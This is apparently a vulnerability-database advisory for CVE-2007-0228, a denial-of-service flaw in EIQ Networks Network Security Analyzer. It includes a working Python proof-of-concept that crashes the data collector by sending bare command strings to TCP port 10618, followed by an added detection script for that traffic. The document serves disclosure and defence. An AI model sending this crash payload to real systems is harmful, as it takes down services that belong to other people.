EIQ Networks Denial-of-Service Vulnerability

Vulnerability ID: 1111985
Vulnerability type: Other
Published: 2007-01-10
Updated: 2007-01-15
CVE ID: CVE-2007-0228
CNNVD-ID: CNNVD-200701-170
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/3112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-170
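|Vulnerability details
The data collector server in the EIQ Networks Network Security Analyzer allows remote attackers to cause a denial of service (server crash) by sending a (1) &CONNECTSERVER&, (2) &ADDENTRY&, (3) &FIN&, (4) &START&, (5) &LOGPATH&, (6) &FWADELTA&, (7) &FWALOG&, (8) &SETSYNCHRONOUS&, (9) &SETPRGFILE&, or (10) &SETREPLYPORT& string to TCP port 10618. This triggers a NULL pointer dereference.
|Exploit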
#!c:\python\python.exe
# uncomment whichever function you'd like. they'll all crash in a similar way.

# Any of the following "function names" will cause the service to throw an access violation 
# while dereferencing the return value from a call to FindIndex 
# ( http://msdn2.microsoft.com/de-de/library/a93550bb(VS.80).aspx):

# Ethan Hunt <m34r[@]hackermail.com>

import socket

s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.connect(('192.168.1.101', 10618))

print "[*] connected"

s.send("&CONNECTSERVER&")
#s.send("&ADDENTRY&")
#s.send("&FIN&")
#s.send("&START&")
#s.send("&LOGPATH&")
#s.send("&FWADELTA&")
#s.send("&FWALOG&")
#s.send("&SETSYNCHRONOUS&")
#s.send("&SETPRGFILE&")
#s.send("&SETREPLYPORT&")

print "disconnecting."

s.close()

# milw0rm.com [2007-01-10]
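
For detection, the check below flags connections to TCP port 10618 whose whole client stream is one of the ten command names listed above and nothing else, which is what the proof of concept sends. It is an added example, not part of the original advisory or exploit; the record layout, the function names and the sample traffic are constructed, and it assumes legitimate messages carry data after the command name, which this page does not document.

```python
# Added detection example; record layout and names are assumptions.
TRIGGER_TOKENS = (
    b"&CONNECTSERVER&", b"&ADDENTRY&", b"&FIN&", b"&START&", b"&LOGPATH&",
    b"&FWADELTA&", b"&FWALOG&", b"&SETSYNCHRONOUS&", b"&SETPRGFILE&",
    b"&SETREPLYPORT&",
)
COLLECTOR_PORT = 10618  # TCP port named in the advisory


def bare_token(stream: bytes):
    """Return the token if the client stream is one command name and nothing else."""
    body = stream.strip(b"\r\n\t \x00")
    return body if body in TRIGGER_TOKENS else None


def find_suspect_connections(segments):
    """segments: iterable of (conn_id, dst_port, payload) in capture order.

    Client-to-server payloads are reassembled per connection first, because a
    single send() may arrive as several TCP segments.
    """
    streams = {}
    for conn_id, dst_port, payload in segments:
        if dst_port == COLLECTOR_PORT:
            streams[conn_id] = streams.get(conn_id, b"") + payload
    hits = []
    for conn_id, stream in streams.items():
        token = bare_token(stream)
        if token is not None:
            hits.append((conn_id, token.decode("ascii")))
    return hits


# Constructed sample traffic (not captured from a real system).
SAMPLE_SEGMENTS = [
    ("10.0.0.5:40001", 10618, b"&CONNECTSERVER&"),
    ("10.0.0.6:40002", 10618, b"&SETREPLY"),      # token split across segments
    ("10.0.0.6:40002", 10618, b"PORT&\r\n"),
    ("10.0.0.7:40003", 10618, b"&LOGPATH&C:\\logs\\fw.log&"),  # hypothetical message with data
    ("10.0.0.8:40004", 8080, b"&FIN&"),           # other port: ignored
]

if __name__ == "__main__":
    for conn, token in find_suspect_connections(SAMPLE_SEGMENTS):
        print(f"ALERT {conn} sent bare {token} to tcp/{COLLECTOR_PORT}")
```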
|References

Source: BID
Name: 21994
Link: http://www.securityfocus.com/bid/21994
Source: OSVDB
Name: 32725
Link: http://osvdb.org/32725
Source: FULLDISC
Name: 20070110EIQNetworksNetworkSecurityAnalyzerDoSVulnerability
Link: http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0209.html
Source: XF
Name: eiq-datacollector-dos(31428)
Link: http://xforce.iss.net/xforce/xfdb/31428
Source: VUPEN
Name: ADV-2007-0147
Link: http://www.frsirt.com/english/advisories/2007/0147
Source: SECUNIA
Name: 23693
Link: http://secunia.com/advisories/23693